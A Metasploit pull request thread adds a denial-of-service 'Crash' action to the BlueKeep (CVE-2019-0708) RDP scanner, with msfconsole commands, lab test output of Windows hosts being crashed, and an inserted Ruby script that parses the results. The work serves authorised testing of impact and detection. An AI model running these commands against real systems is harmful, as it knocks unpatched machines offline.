
Add DoS action to BlueKeep (CVE-2019-0708) scanner #12170

Merged
merged 6 commits into from Aug 8, 2019

Conversation

@TomSellers
Contributor

commented Aug 7, 2019

This PR adds a denial of service action to the existing BlueKeep (CVE-2019-0708) module auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb.

The goal of providing this capability is to enable verification of impact as well as testing of detection and mitigating controls.

The DoS trigger has been tested against

  • Windows XP Pro, Service Pack 3
  • Windows 2003 Server, Service Pack 1
  • Windows 7 Pro
  • Windows Server 2008 R2, Service Pack 1

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
  • Verify that it still successfully identifies vulnerable hosts
  • Verify that it still successfully identifies hosts that are not vulnerable
  • set action Crash
  • Verify that it causes a BSoD on vulnerable hosts
  • Verify that it does not cause BSoD on hosts that are not vulnerable

Example output

Windows XP Pro

Check vulnerability - normal output

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set action Scan 
action => Scan
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit

[+] 192.168.50.121:3389   - The target is vulnerable.
[*] 192.168.50.121:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Check vulnerability - verbose output

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > options

Module options (auxiliary/scanner/rdp/cve_2019_0708_bluekeep):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  rdesktop         no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                        no        The client domain name to report during connect
   RDP_USER                          no        The username to report during connect, UNSET = random
   RHOSTS           192.168.50.121   yes       The target address range or CIDR identifier
   RPORT            3389             yes       The target port (TCP)
   THREADS          4                yes       The number of concurrent threads

Auxiliary action:

   Name  Description
   ----  -----------
   Scan  Scan for exploitable targets

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit

[*] 192.168.50.121:3389   - Verifying RDP protocol...
[*] 192.168.50.121:3389   - Attempting to connect using TLS security
[*] 192.168.50.121:3389   - Attempt to connect with TLS failed but looks like the target is Windows XP
[*] 192.168.50.121:3389   - Attempting to connect using Standard RDP security
[*] 192.168.50.121:3389   - Server requests RDP Security
[*] 192.168.50.121:3389   - Sending erect domain request
[*] 192.168.50.121:3389   - Sending security exchange PDU
[*] 192.168.50.121:3389   - Sending client info PDU
[*] 192.168.50.121:3389   - Received License packet
[*] 192.168.50.121:3389   - Waiting for Server Demand packet
[*] 192.168.50.121:3389   - Received Server Demand packet
[*] 192.168.50.121:3389   - Sending client confirm active PDU
[*] 192.168.50.121:3389   - Sending client synchronize PDU
[*] 192.168.50.121:3389   - Sending client control cooperate PDU
[*] 192.168.50.121:3389   - Sending client control request control PDU
[*] 192.168.50.121:3389   - Sending client input sychronize PDU
[*] 192.168.50.121:3389   - Sending client font list PDU
[*] 192.168.50.121:3389   - Sending patch check payloads
[+] 192.168.50.121:3389   - The target is vulnerable.
[*] 192.168.50.121:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Causing a crash - normal output

[+] 192.168.50.121:3389   - Target service appears to have been successfully crashed.
[+] 192.168.50.121:3389   - The target is vulnerable.
[*] 192.168.50.121:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Causing a crash - verbose

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set action Crash
Action => Crash
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit

[*] 192.168.50.121:3389   - Verifying RDP protocol...
[*] 192.168.50.121:3389   - Attempting to connect using TLS security
[*] 192.168.50.121:3389   - Attempt to connect with TLS failed but looks like the target is Windows XP
[*] 192.168.50.121:3389   - Attempting to connect using Standard RDP security
[*] 192.168.50.121:3389   - Server requests RDP Security
[*] 192.168.50.121:3389   - Sending erect domain request
[*] 192.168.50.121:3389   - Sending security exchange PDU
[*] 192.168.50.121:3389   - Sending client info PDU
[*] 192.168.50.121:3389   - Received License packet
[*] 192.168.50.121:3389   - Waiting for Server Demand packet
[*] 192.168.50.121:3389   - Received Server Demand packet
[*] 192.168.50.121:3389   - Sending client confirm active PDU
[*] 192.168.50.121:3389   - Sending client synchronize PDU
[*] 192.168.50.121:3389   - Sending client control cooperate PDU
[*] 192.168.50.121:3389   - Sending client control request control PDU
[*] 192.168.50.121:3389   - Sending client input sychronize PDU
[*] 192.168.50.121:3389   - Sending client font list PDU
[*] 192.168.50.121:3389   - Sending denial of service payloads
[+] 192.168.50.121:3389   - Target service appears to have been successfully crashed.
[+] 192.168.50.121:3389   - The target is vulnerable.
[*] 192.168.50.121:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Windows Server 2008 R2

Check vulnerability - NLA enabled - normal output

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit

[*] 192.168.50.146:3389   - The target is not exploitable.
[*] 192.168.50.146:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Check vulnerability - NLA enabled - verbose output

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set verbose true
verbose => true
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit

[*] 192.168.50.146:3389   - Verifying RDP protocol...
[*] 192.168.50.146:3389   - Attempting to connect using TLS security
[*] 192.168.50.146:3389   - Server requires NLA (CredSSP) security which mitigates this vulnerability.
[*] 192.168.50.146:3389   - The target is not exploitable.
[*] 192.168.50.146:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Check vulnerability - normal output

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set action Crash
Action => Crash
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit 

[+] 192.168.50.146:3389   - The target is vulnerable.
[*] 192.168.50.146:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Check vulnerability - verbose output

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit 

[*] 192.168.50.146:3389   - Verifying RDP protocol...
[*] 192.168.50.146:3389   - Attempting to connect using TLS security
[*] 192.168.50.146:3389   - Server requests TLS
[*] 192.168.50.146:3389   - Sending erect domain request
[*] 192.168.50.146:3389   - Sending client info PDU
[*] 192.168.50.146:3389   - Received License packet
[*] 192.168.50.146:3389   - Waiting for Server Demand packet
[*] 192.168.50.146:3389   - Received Server Demand packet
[*] 192.168.50.146:3389   - Sending client confirm active PDU
[*] 192.168.50.146:3389   - Sending client synchronize PDU
[*] 192.168.50.146:3389   - Sending client control cooperate PDU
[*] 192.168.50.146:3389   - Sending client control request control PDU
[*] 192.168.50.146:3389   - Sending client input sychronize PDU
[*] 192.168.50.146:3389   - Sending client font list PDU
[*] 192.168.50.146:3389   - Sending patch check payloads
[+] 192.168.50.146:3389   - The target is vulnerable.
[*] 192.168.50.146:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Causing a crash - normal output

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set action Crash
Action => Crash
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit

[+] 192.168.50.146:3389   - Target service appears to have been successfully crashed.
[+] 192.168.50.146:3389   - The target is vulnerable.
[*] 192.168.50.146:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Causing a crash - verbose

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set action Crash
Action => Crash
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit

[*] 192.168.50.146:3389   - Verifying RDP protocol...
[*] 192.168.50.146:3389   - Attempting to connect using TLS security
[*] 192.168.50.146:3389   - Server requests TLS
[*] 192.168.50.146:3389   - Sending erect domain request
[*] 192.168.50.146:3389   - Sending client info PDU
[*] 192.168.50.146:3389   - Received License packet
[*] 192.168.50.146:3389   - Waiting for Server Demand packet
[*] 192.168.50.146:3389   - Received Server Demand packet
[*] 192.168.50.146:3389   - Sending client confirm active PDU
[*] 192.168.50.146:3389   - Sending client synchronize PDU
[*] 192.168.50.146:3389   - Sending client control cooperate PDU
[*] 192.168.50.146:3389   - Sending client control request control PDU
[*] 192.168.50.146:3389   - Sending client input sychronize PDU
[*] 192.168.50.146:3389   - Sending client font list PDU
[*] 192.168.50.146:3389   - Sending denial of service payloads
[+] 192.168.50.146:3389   - Target service appears to have been successfully crashed.
[+] 192.168.50.146:3389   - The target is vulnerable.
[*] 192.168.50.146:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Desired by #12171.

@tsellers-r7


commented Aug 7, 2019

Any comments on 'Stability' => [ CRASH_SAFE ],?

@bwatters-r7

Contributor

commented Aug 7, 2019

I ran this against the Windows Range.
34 Windows VMs, all with firewalls disabled and RDP enabled.
6 VMs vulnerable, 28 not.

Scanner Options:

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > show options

Module options (auxiliary/scanner/rdp/cve_2019_0708_bluekeep):

   Name             Current Setting   Required  Description
   ----             ---------------   --------  -----------
   EXPLOIT_DOS      false             no        Trigger denial of service vulnerability.
   RDP_CLIENT_IP    192.168.0.100     yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  rdesktop          no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                         no        The client domain name to report during connect
   RDP_USER                           no        The username to report during connect, UNSET = random
   RHOSTS           192.168.134.0/24  yes       The target address range or CIDR identifier
   RPORT            3389              yes       The target port (TCP)
   THREADS          25                yes       The number of concurrent threads
  1. Scanner reports that the six expected vulnerable VMs are vulnerable:
tmoose@ubuntu:~/rapid7/metasploit-framework$ cat output.txt | grep vulnerable
[+] 192.168.134.113:3389  - The target is vulnerable.
[+] 192.168.134.120:3389  - The target is vulnerable.
[+] 192.168.134.133:3389  - The target is vulnerable.
[+] 192.168.134.130:3389  - The target is vulnerable.
[+] 192.168.134.142:3389  - The target is vulnerable.
[+] 192.168.134.199:3389  - The target is vulnerable.
  2. Scanner reports that the twenty-six expected non-vulnerable VMs are not vulnerable:
[*] 192.168.134.104:3389  - The target is not exploitable.
[*] 192.168.134.109:3389  - The target is not exploitable.
[*] 192.168.134.106:3389  - The target is not exploitable.
[*] 192.168.134.114:3389  - The target is not exploitable.
[*] 192.168.134.123:3389  - The target is not exploitable.
[*] 192.168.134.115:3389  - The target is not exploitable.
[*] 192.168.134.119:3389  - The target is not exploitable.
[*] 192.168.134.121:3389  - The target is not exploitable.
[*] 192.168.134.118:3389  - The target is not exploitable.
[*] 192.168.134.117:3389  - The target is not exploitable.
[*] 192.168.134.132:3389  - The target is not exploitable.
[*] 192.168.134.129:3389  - The target is not exploitable.
[*] 192.168.134.146:3389  - The target is not exploitable.
[*] 192.168.134.151:3389  - The target is not exploitable.
[*] 192.168.134.149:3389  - The target is not exploitable.
[*] 192.168.134.161:3389  - The target is not exploitable.
[*] 192.168.134.164:3389  - The target is not exploitable.
[*] 192.168.134.165:3389  - The target is not exploitable.
[*] 192.168.134.162:3389  - The target is not exploitable.
[*] 192.168.134.169:3389  - The target is not exploitable.
[*] 192.168.134.171:3389  - The target is not exploitable.
[*] 192.168.134.172:3389  - The target is not exploitable.
[*] 192.168.134.177:3389  - The target is not exploitable.
[*] 192.168.134.185:3389  - The target is not exploitable.
[*] 192.168.134.187:3389  - The target is not exploitable.
[*] 192.168.134.193:3389  - The target is not exploitable.
[*] 192.168.134.192:3389  - The target is not exploitable.
[*] 192.168.134.191:3389  - The target is not exploitable.

DoS results were not entirely consistent, but effective:
First run: Several did not BSoD, then I started charting
Run 2:
Windows 7x86 SP0 failed to restart
Run 3:
Win7x64 SP1 and Win2008r2x64_SP1 failed to restart
Run 4:
All rebooted.

If you are interested in the technical stuff:

Range contents (via Nmap on 3389)

Starting Nmap 7.01 ( https://nmap.org ) at 2019-08-07 09:47 CDT
Nmap scan report for Win2019x64.moose (192.168.134.104)
Host is up (0.00044s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win1803x64.moose (192.168.134.106)
Host is up (0.0053s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win2016x64.moose (192.168.134.109)
Host is up (0.0050s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win7x86.moose (192.168.134.113)
Host is up (0.0046s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x86_1703.moose (192.168.134.114)
Host is up (0.0044s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win1709x64.moose (192.168.134.115)
Host is up (0.0043s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x64.moose (192.168.134.117)
Host is up (0.0041s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x64_1703.moose (192.168.134.118)
Host is up (0.0041s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x86_1803.moose (192.168.134.119)
Host is up (0.0040s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win7x64sp1.moose (192.168.134.120)
Host is up (0.0038s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x64_1511.moose (192.168.134.121)
Host is up (0.0037s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win8x64.moose (192.168.134.123)
Host is up (0.0035s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x86.moose (192.168.134.129)
Host is up (0.0034s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win7x86sp1.moose (192.168.134.130)
Host is up (0.0033s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x64_1709.moose (192.168.134.132)
Host is up (0.0031s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win2008r2x64sp1.moose (192.168.134.133)
Host is up (0.0029s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win7x64.moose (192.168.134.142)
Host is up (0.0021s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win1809x64.moose (192.168.134.146)
Host is up (0.0016s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x64_1607.moose (192.168.134.149)
Host is up (0.0013s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win2012x64.moose (192.168.134.151)
Host is up (0.0011s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win81x64sp1.moose (192.168.134.161)
Host is up (0.0040s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win81x64.moose (192.168.134.162)
Host is up (0.0039s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x64_1809.moose (192.168.134.164)
Host is up (0.0037s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x86_1709.moose (192.168.134.165)
Host is up (0.0036s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win81x86sp1.moose (192.168.134.169)
Host is up (0.0032s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win81x86.moose (192.168.134.171)
Host is up (0.0030s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win2012r2x64sp1.moose (192.168.134.172)
Host is up (0.0029s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x64_1803.moose (192.168.134.177)
Host is up (0.0024s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win8x86.moose (192.168.134.185)
Host is up (0.0015s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win2012r2x64.moose (192.168.134.187)
Host is up (0.0016s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x86_1809.moose (192.168.134.191)
Host is up (0.0012s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x86_1607.moose (192.168.134.192)
Host is up (0.0010s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win10x86_1511.moose (192.168.134.193)
Host is up (0.00077s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

Nmap scan report for Win2008r2x64.moose (192.168.134.199)
Host is up (0.0019s latency).
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?

@bwatters-r7

Contributor

commented Aug 7, 2019

Ooops.... Forgot output from crashes:

[+] 192.168.134.120:3389  - Target service appears to have been successfully crashed.
[+] 192.168.134.130:3389  - Target service appears to have been successfully crashed.
[+] 192.168.134.113:3389  - Target service appears to have been successfully crashed.
[+] 192.168.134.133:3389  - Target service appears to have been successfully crashed.
[+] 192.168.134.142:3389  - Target service appears to have been successfully crashed.
[+] 192.168.134.199:3389  - Target service appears to have been successfully crashed.
@tsellers-r7


commented Aug 7, 2019

Thanks @bwatters-r7, I'll dig in and see if I can reproduce the delayed crash.

@busterb

Member

commented Aug 7, 2019

I switched this to have an explicit 'Crash' action instead of a separate datastore option and pushed to this PR. @bwatters would you mind verifying that it looks just the same as before? I also updated the PR testing notes to match.

@tsellers-r7


commented Aug 7, 2019

Looks good to me. I can revisit the crash consistency after the library changes land.

@busterb

Member

commented Aug 7, 2019

Sounds good to me.

@bwatters-r7

Contributor

commented Aug 7, 2019

Admittedly, I'm a little sad that when you hit show options it does not mention that there is a crash option, but I don't think that's a "this module" problem.....

Module options (auxiliary/scanner/rdp/cve_2019_0708_bluekeep):

   Name             Current Setting   Required  Description
   ----             ---------------   --------  -----------
   RDP_CLIENT_IP    192.168.0.100     yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  rdesktop          no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                         no        The client domain name to report during connect
   RDP_USER                           no        The username to report during connect, UNSET = random
   RHOSTS           192.168.134.0/24  yes       The target address range or CIDR identifier
   RPORT            3389              yes       The target port (TCP)
   THREADS          25                yes       The number of concurrent threads


Auxiliary action:

   Name  Description
   ----  -----------
   Scan  Scan for exploitable targets

Scan output on not exploitable:

[*] 192.168.134.104:3389  - The target is not exploitable.
[*] 192.168.134.109:3389  - The target is not exploitable.
[*] 192.168.134.117:3389  - The target is not exploitable.
[*] 192.168.134.121:3389  - The target is not exploitable.
[*] 192.168.134.115:3389  - The target is not exploitable.
[*] 192.168.134.106:3389  - The target is not exploitable.
[*] 192.168.134.118:3389  - The target is not exploitable.
[*] 192.168.134.123:3389  - The target is not exploitable.
[*] 192.168.134.114:3389  - The target is not exploitable.
[*] 192.168.134.119:3389  - The target is not exploitable.
[*] 192.168.134.129:3389  - The target is not exploitable.
[*] 192.168.134.132:3389  - The target is not exploitable.
[*] 192.168.134.149:3389  - The target is not exploitable.
[*] 192.168.134.146:3389  - The target is not exploitable.
[*] 192.168.134.151:3389  - The target is not exploitable.
[*] 192.168.134.162:3389  - The target is not exploitable.
[*] 192.168.134.164:3389  - The target is not exploitable.
[*] 192.168.134.161:3389  - The target is not exploitable.
[*] 192.168.134.172:3389  - The target is not exploitable.
[*] 192.168.134.169:3389  - The target is not exploitable.
[*] 192.168.134.177:3389  - The target is not exploitable.
[*] 192.168.134.165:3389  - The target is not exploitable.
[*] 192.168.134.171:3389  - The target is not exploitable.
[*] 192.168.134.187:3389  - The target is not exploitable.
[*] 192.168.134.192:3389  - The target is not exploitable.
[*] 192.168.134.193:3389  - The target is not exploitable.
[*] 192.168.134.191:3389  - The target is not exploitable.
[*] 192.168.134.185:3389  - The target is not exploitable.

Scan output on vulnerable:

[+] 192.168.134.120:3389  - The target is vulnerable.
[+] 192.168.134.113:3389  - The target is vulnerable.
[+] 192.168.134.133:3389  - The target is vulnerable.
[+] 192.168.134.130:3389  - The target is vulnerable.
[+] 192.168.134.142:3389  - The target is vulnerable.
[+] 192.168.134.199:3389  - The target is vulnerable.

Still a bit flaky on the actual BSoD:

[-] 192.168.134.130:3389  - Target doesn't appear to have been crashed.
[-] 192.168.134.113:3389  - Target doesn't appear to have been crashed.
[-] 192.168.134.142:3389  - Target doesn't appear to have been crashed.
[+] 192.168.134.120:3389  - Target service appears to have been successfully crashed.
[+] 192.168.134.133:3389  - Target service appears to have been successfully crashed.
[+] 192.168.134.199:3389  - Target service appears to have been successfully crashed.

Second Run:

[+] 192.168.134.113:3389  - Target service appears to have been successfully crashed.
[-] 192.168.134.130:3389  - Target doesn't appear to have been crashed.
[+] 192.168.134.120:3389  - Target service appears to have been successfully crashed.
[+] 192.168.134.142:3389  - Target service appears to have been successfully crashed.
[+] 192.168.134.133:3389  - Target service appears to have been successfully crashed.

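The range testing above relies on grepping msfconsole output by hand and comparing crash results between runs. The following is an added example, not code from this PR or from the Metasploit module: a small Ruby parser for the scanner's `[+]`/`[*]`/`[-]` status lines that tallies scan and crash results per host and flags hosts whose crash outcome differed between runs (the "flaky BSoD" case). The sample runs `RUN1` and `RUN2` are constructed for the example, reusing the message formats shown on this page; the function names are the example's own.

```ruby
# Added example, not part of the PR or the Metasploit module.
# Parses cve_2019_0708_bluekeep scanner console output and tallies
# per-host results across repeated runs so inconsistent crashes stand out.

# One status line: "[+] 192.168.134.120:3389  - The target is vulnerable."
LINE_RE = /^\[([+*-])\]\s+(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s+-\s+(.*)$/

# Map the module's status messages to a normalised result symbol;
# progress lines ("Scanned 1 of 1 hosts", "Sending ... PDU") map to nil.
def classify(message)
  case message
  when /The target is vulnerable/            then :vulnerable
  when /The target is not exploitable/       then :not_exploitable
  when /successfully crashed/                then :crashed
  when /doesn't appear to have been crashed/ then :not_crashed
  end
end

# Parse one run's output into { "ip:port" => [result, ...] }, in order seen.
def parse_run(text)
  results = Hash.new { |h, k| h[k] = [] }
  text.each_line do |line|
    m = LINE_RE.match(line.strip) or next
    sym = classify(m[4]) or next
    results["#{m[2]}:#{m[3]}"] << sym
  end
  results
end

# Count results of each kind in one run, e.g. { vulnerable: 6, crashed: 3 }.
def summarize(text)
  parse_run(text).values.flatten.each_with_object(Hash.new(0)) { |s, h| h[s] += 1 }
end

# Combine several runs; for every host that produced a crash verdict, list
# (run number, verdict) pairs and whether the verdict was the same every time.
def crash_consistency(runs)
  per_host = Hash.new { |h, k| h[k] = [] }
  runs.each_with_index do |run, i|
    parse_run(run).each do |host, syms|
      verdict = syms.find { |s| %i[crashed not_crashed].include?(s) }
      per_host[host] << [i + 1, verdict] if verdict
    end
  end
  per_host.transform_values do |obs|
    { runs: obs, consistent: obs.map(&:last).uniq.size == 1 }
  end
end

# Constructed sample runs (same message formats as the module's output).
RUN1 = <<~OUT
  [+] 192.168.134.120:3389  - The target is vulnerable.
  [*] 192.168.134.104:3389  - The target is not exploitable.
  [-] 192.168.134.130:3389  - Target doesn't appear to have been crashed.
  [+] 192.168.134.120:3389  - Target service appears to have been successfully crashed.
  [*] 192.168.134.120:3389  - Scanned 2 of 2 hosts (100% complete)
OUT

RUN2 = <<~OUT
  [+] 192.168.134.130:3389  - Target service appears to have been successfully crashed.
  [+] 192.168.134.120:3389  - Target service appears to have been successfully crashed.
OUT

if __FILE__ == $PROGRAM_NAME
  puts "Run 1: #{summarize(RUN1)}"
  crash_consistency([RUN1, RUN2]).each do |host, info|
    flag = info[:consistent] ? "consistent" : "INCONSISTENT"
    puts "#{host} #{flag} #{info[:runs].inspect}"
  end
end
```

Feed it saved console output (one file per run) and any host that flips between "successfully crashed" and "doesn't appear to have been crashed" is reported as inconsistent, which is the pattern seen in the runs above.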
@wvu-r7

Contributor

commented Aug 7, 2019

Admittedly, I'm a little sad that when you hit show options it does not mention that there is a crash option, but I don't think that's a "this module" problem.....

Correct, show options will show only the selected action, which is dumb. You need to run info or show actions to get the full list. I've got a refactor that addresses that, but it hasn't been added to #11785 yet.

@tsellers-r7


commented Aug 7, 2019

FYI @bwatters-r7, I'm working on the reliability issue now.

@tsellers-r7


commented Aug 7, 2019

@bwatters-r7 - Can you test again? I still think it's gonna be flaky, but it's been a touch more robust with these minor tweaks.

@wvu-r7

wvu-r7 approved these changes Aug 7, 2019

Contributor

left a comment

Happy enough with these changes. Feel free to update the PR (merge or rebase) when #12171 lands.

@wvu-r7 wvu-r7 self-assigned this Aug 7, 2019

@busterb

busterb approved these changes Aug 7, 2019

Member

left a comment

Looks good to me too.

TomSellers added some commits Aug 8, 2019

@busterb busterb merged commit 46b6a59 into rapid7:master Aug 8, 2019

2 of 3 checks passed

continuous-integration/travis-ci/pr The Travis CI build is in progress
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.

busterb added a commit that referenced this pull request Aug 8, 2019

msjenkins-r7 added a commit that referenced this pull request Aug 8, 2019

@busterb busterb self-assigned this Aug 8, 2019

@busterb

Member

commented Aug 8, 2019

Release Notes

This adds a denial of service action to the existing BlueKeep (CVE-2019-0708) scanner module auxiliary/scanner/rdp/cve_2019_0708_bluekeep. The goal of providing this capability is to enable verification of impact as well as testing of detection and mitigating controls.

@TomSellers TomSellers deleted the TomSellers:bluekeep_dos branch Aug 8, 2019

@wvu-r7 wvu-r7 changed the title BlueKeep: Add DoS exploit Add DoS action to BlueKeep (CVE-2019-0708) scanner Aug 8, 2019
